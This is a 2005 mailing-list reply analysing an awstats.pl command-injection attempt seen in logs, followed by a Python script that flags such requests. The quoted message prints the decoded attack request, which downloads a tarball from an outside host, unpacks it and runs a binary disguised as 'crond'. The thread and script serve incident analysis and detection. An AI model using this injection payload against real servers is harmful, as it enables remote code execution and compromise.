Security Breach
Brian Fahrlander
brian at fahrlander.net
Fri Mar 4 18:51:12 UTC 2005
On Fri, 2005-03-04 at 17:58 +0000, Paul Howarth wrote:
> Replace the url-encoded characters and you get:
>
> /cgi-bin/awstats.pl?configdir=|echo ;echo b_exp;cd /tmp;curl -0 wget
> zburchi.idilis.ro/badboy.tar.gz;tar -zxvf badboy.tar.gz;cd psybnc;mv
> mech crond;export PATH=;crond;echo e_exp;%00
>
> So the attacker has tricked the script into executing a set of shell
> commands, which include changing directory to /tmp, downloading a
> tarball from a Romanian site, extracting that tarball and then executing
> a program from the downloaded and extracted tarball, after renaming it
> to "crond" in an effort to disguise it.
Damned fine research. Good job; I'm impressed.
--
------------------------------------------------------------------------
Brian Fahrländer Christian, Conservative, and Technomad
Evansville, IN http://www.fahrlander.net
ICQ: 5119262 AIM: WheelDweller
------------------------------------------------------------------------
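The decoding step described in the quoted message, turned into a log check. This is an added example, not part of the original thread: the log format (common/combined), the character set treated as suspicious, and the sample lines are assumptions, and the sample request is a constructed, shortened stand-in for the one quoted above.

```python
import re
from urllib.parse import unquote, urlsplit

# Request field of a common/combined-format access log line.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Shell metacharacters and NUL: none belong in an awstats.pl parameter.
# (Assumed character set for this example; tune it for your own logs.)
SUSPICIOUS = re.compile(r"[|;`$<>\x00]")

# Constructed sample lines. The second is a shortened stand-in for the
# request discussed in the thread, with the download step left out.
SAMPLE_LOG = [
    '192.0.2.10 - - [04/Mar/2005:17:02:11 +0000] '
    '"GET /cgi-bin/awstats.pl?config=www HTTP/1.1" 200 5120',
    '192.0.2.77 - - [04/Mar/2005:17:03:40 +0000] '
    '"GET /cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp'
    '%3bcd%20%2ftmp%3becho%20e_exp%3b%00 HTTP/1.0" 200 312',
]


def inspect_line(line):
    """Return (param, decoded_value) pairs that look like command injection."""
    match = REQUEST.search(line)
    if not match:
        return []
    parts = urlsplit(match.group(1))
    if not parts.path.endswith("awstats.pl"):
        return []
    hits = []
    for raw in parts.query.split("&"):
        name, _, value = raw.partition("=")
        # Decode the way the web server would before the CGI sees the value.
        decoded = unquote(value.replace("+", " "))
        if SUSPICIOUS.search(decoded):
            hits.append((unquote(name), decoded))
    return hits


def scan(lines):
    """Return (line_number, param, decoded_value) for every flagged parameter."""
    return [(n, p, v) for n, line in enumerate(lines, 1)
            for p, v in inspect_line(line)]


if __name__ == "__main__":
    for n, param, value in scan(SAMPLE_LOG):
        print(f"line {n}: {param} = {value!r}")
```

Printing with `!r` keeps the trailing NUL byte visible as `\x00` instead of silently truncating the output.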